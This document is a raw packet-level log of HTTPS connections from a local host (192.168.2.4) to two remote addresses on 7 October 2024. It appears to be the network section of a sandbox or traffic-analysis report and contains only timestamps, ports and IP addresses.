                Oct 7, 2024 03:27:00.013621092 CEST49842443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.013628006 CEST4434984213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.013638020 CEST49842443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.013642073 CEST4434984213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.015836954 CEST49847443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.015866041 CEST4434984713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.015921116 CEST49847443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.016051054 CEST49847443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.016061068 CEST4434984713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.044451952 CEST4434984313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.044636965 CEST4434984313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.044749022 CEST49843443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.044837952 CEST49843443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.044852018 CEST4434984313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.044881105 CEST49843443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.044888020 CEST4434984313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.048072100 CEST49848443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.048116922 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.048178911 CEST49848443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.048429966 CEST49848443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.048440933 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.410223007 CEST4434984413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.410769939 CEST49844443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.410806894 CEST4434984413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.411232948 CEST49844443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.411237001 CEST4434984413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.512712002 CEST4434984413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.512739897 CEST4434984413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.512778044 CEST4434984413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.512780905 CEST49844443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.512814999 CEST49844443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.513147116 CEST49844443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.513159037 CEST4434984413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.513168097 CEST49844443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.513174057 CEST4434984413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.516275883 CEST49849443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.516349077 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.516429901 CEST49849443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.516568899 CEST49849443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.516602993 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.667169094 CEST4434984713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.667366982 CEST4434984513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.667814970 CEST4434984613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.667856932 CEST49847443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.667871952 CEST4434984713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.668132067 CEST49847443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.668131113 CEST49845443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.668135881 CEST4434984713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.668159008 CEST4434984513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.668386936 CEST49846443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.668405056 CEST4434984613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.668747902 CEST49845443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.668747902 CEST49846443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.668755054 CEST4434984513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.668768883 CEST4434984613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.743284941 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.743972063 CEST49848443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.743989944 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.744270086 CEST49848443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.744283915 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.769300938 CEST4434984513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.769620895 CEST4434984513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.769721985 CEST49845443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.769721985 CEST49845443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.769752026 CEST49845443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.769771099 CEST4434984513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.772468090 CEST4434984713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.772690058 CEST4434984713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.772751093 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.772794008 CEST49847443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.772794008 CEST49847443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.772820950 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.772859097 CEST49847443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.772869110 CEST4434984713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.772985935 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.773406982 CEST4434984613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.773443937 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.773453951 CEST4434984613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.773480892 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.773488045 CEST4434984613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.773634911 CEST49846443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.773693085 CEST49846443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.773698092 CEST4434984613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.773799896 CEST49846443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.773807049 CEST4434984613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.775346994 CEST49851443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.775378942 CEST4434985113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.775562048 CEST49852443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.775604010 CEST4434985213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.775698900 CEST49851443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.775743961 CEST49852443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.775887966 CEST49852443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.775901079 CEST4434985213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.775983095 CEST49851443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.775991917 CEST4434985113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.846302032 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.846381903 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.850008965 CEST49848443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.850230932 CEST49848443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.850250006 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.850363970 CEST49848443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.850368977 CEST4434984813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.852888107 CEST49853443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.852969885 CEST4434985313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:00.853230000 CEST49853443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.853549957 CEST49853443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:00.853580952 CEST4434985313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.164376974 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.166629076 CEST49849443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.166665077 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.168867111 CEST49849443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.168873072 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.270174026 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.270270109 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.272290945 CEST49849443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.272864103 CEST49849443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.272882938 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.272902966 CEST49849443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.272908926 CEST4434984913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.280870914 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.280913115 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.280998945 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.284869909 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.284881115 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.428436995 CEST4434985213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.429131031 CEST49852443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.429168940 CEST4434985213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.430002928 CEST49852443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.430010080 CEST4434985213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.435359001 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.436393976 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.436393976 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.436433077 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.436444044 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.448219061 CEST4434985113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.449295044 CEST49851443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.449295044 CEST49851443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.449315071 CEST4434985113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.449357986 CEST4434985113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.515029907 CEST4434985313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.517488003 CEST49853443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.517520905 CEST4434985313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.520874023 CEST49853443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.520879984 CEST4434985313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.529035091 CEST4434985213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.529210091 CEST4434985213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.533365011 CEST49852443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.533365011 CEST49852443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.533488989 CEST49852443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.533512115 CEST4434985213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.537795067 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.538007975 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.538060904 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.538135052 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.538135052 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.538535118 CEST49855443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.538573027 CEST4434985513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.538769960 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.538769960 CEST49850443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.538784981 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.538794041 CEST4434985013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.538811922 CEST49855443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.540867090 CEST49855443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.540879011 CEST4434985513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.548854113 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.548880100 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.552978039 CEST4434985113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.553190947 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.553190947 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.553205013 CEST4434985113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.553221941 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.553417921 CEST49851443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.553417921 CEST49851443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.556289911 CEST49857443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.556292057 CEST49851443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.556301117 CEST4434985113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.556310892 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.556507111 CEST49857443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.556507111 CEST49857443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.556525946 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.620062113 CEST4434985313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.620218039 CEST4434985313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.620929956 CEST49853443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.620929956 CEST49853443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.621555090 CEST49853443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.621567011 CEST4434985313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.626882076 CEST49858443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.626914024 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.626981974 CEST49858443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.627443075 CEST49858443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.627455950 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.760622978 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:27:01.760706902 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:27:01.760757923 CEST49792443192.168.2.4142.250.184.196
                Oct 7, 2024 03:27:01.932537079 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.933139086 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.933171034 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:01.933733940 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:01.933743954 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.058921099 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.058995962 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.059047937 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.059076071 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.059120893 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.059163094 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.075553894 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.075578928 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.075598001 CEST49854443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.075603962 CEST4434985413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.083415031 CEST49859443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.083467960 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.083542109 CEST49859443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.083709002 CEST49859443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.083720922 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.190340996 CEST49792443192.168.2.4142.250.184.196
                Oct 7, 2024 03:27:02.190367937 CEST44349792142.250.184.196192.168.2.4
                Oct 7, 2024 03:27:02.274646997 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.278439045 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.278455019 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.281092882 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.281097889 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.282301903 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.282742023 CEST49857443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.282824039 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.283282042 CEST49857443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.283294916 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.298866034 CEST4434985513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.300760984 CEST49855443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.300810099 CEST4434985513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.302752972 CEST49855443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.302764893 CEST4434985513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.375586033 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.375627995 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.375669003 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.375684023 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.375700951 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.375744104 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.377032995 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.377048969 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.377070904 CEST49856443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.377075911 CEST4434985613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.380839109 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.381740093 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.382674932 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.382725954 CEST49857443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.384356022 CEST49858443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.384367943 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.386099100 CEST49858443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.386105061 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.386535883 CEST49857443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.386552095 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.386562109 CEST49857443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.386568069 CEST4434985713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.403479099 CEST4434985513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.403641939 CEST4434985513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.403702021 CEST49855443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.419764042 CEST49860443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.419828892 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.419891119 CEST49860443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.447876930 CEST49861443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.447983027 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.448079109 CEST49861443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.448873043 CEST49855443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.448903084 CEST4434985513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.453228951 CEST49860443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.453248024 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.455203056 CEST49861443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.455245018 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.465114117 CEST49862443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.465143919 CEST4434986213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.465217113 CEST49862443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.465475082 CEST49862443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.465496063 CEST4434986213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.486403942 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.486597061 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.486645937 CEST49858443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.487298965 CEST49858443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.487310886 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.487320900 CEST49858443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.487325907 CEST4434985813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.492602110 CEST49863443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.492635965 CEST4434986313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.492688894 CEST49863443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.493608952 CEST49863443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.493626118 CEST4434986313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.776073933 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.776973009 CEST49859443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.777003050 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.777817011 CEST49859443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.777832031 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.880232096 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.880873919 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.881088018 CEST49859443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.881162882 CEST49859443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.881162882 CEST49859443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.881182909 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.881187916 CEST4434985913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.886902094 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.886993885 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:02.893198967 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.893199921 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:02.893290997 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.103085995 CEST4434986213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.104480982 CEST49862443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.104480982 CEST49862443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.104546070 CEST4434986213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.104595900 CEST4434986213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.129543066 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.130284071 CEST49860443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.130285025 CEST49860443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.130382061 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.130410910 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.135266066 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.135906935 CEST49861443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.135906935 CEST49861443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.135935068 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.135970116 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.153258085 CEST4434986313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.153881073 CEST49863443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.153881073 CEST49863443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.153901100 CEST4434986313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.153934956 CEST4434986313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.201420069 CEST4434986213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.201630116 CEST4434986213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.201770067 CEST49862443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.201770067 CEST49862443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.201823950 CEST49862443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.201869011 CEST4434986213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.204546928 CEST49865443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.204621077 CEST4434986513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.204746008 CEST49865443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.204857111 CEST49865443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.204875946 CEST4434986513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.235515118 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.235620975 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.235652924 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.235785961 CEST49860443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.235785961 CEST49860443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.236064911 CEST49860443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.236079931 CEST4434986013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.237627983 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.237757921 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.238049030 CEST49861443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.238198042 CEST49861443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.238229990 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.238269091 CEST49861443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.238285065 CEST4434986113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.238426924 CEST49866443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.238455057 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.238590956 CEST49866443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.238713980 CEST49866443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.238740921 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.240848064 CEST49867443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.240920067 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.241128922 CEST49867443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.241130114 CEST49867443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.241197109 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.253424883 CEST4434986313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.253559113 CEST4434986313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.253664017 CEST49863443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.253664017 CEST49863443192.168.2.413.107.246.60
